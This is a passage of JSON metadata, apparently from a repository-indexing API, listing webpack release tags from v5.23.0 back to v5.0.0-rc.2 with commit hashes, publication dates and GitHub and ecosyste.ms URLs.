%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6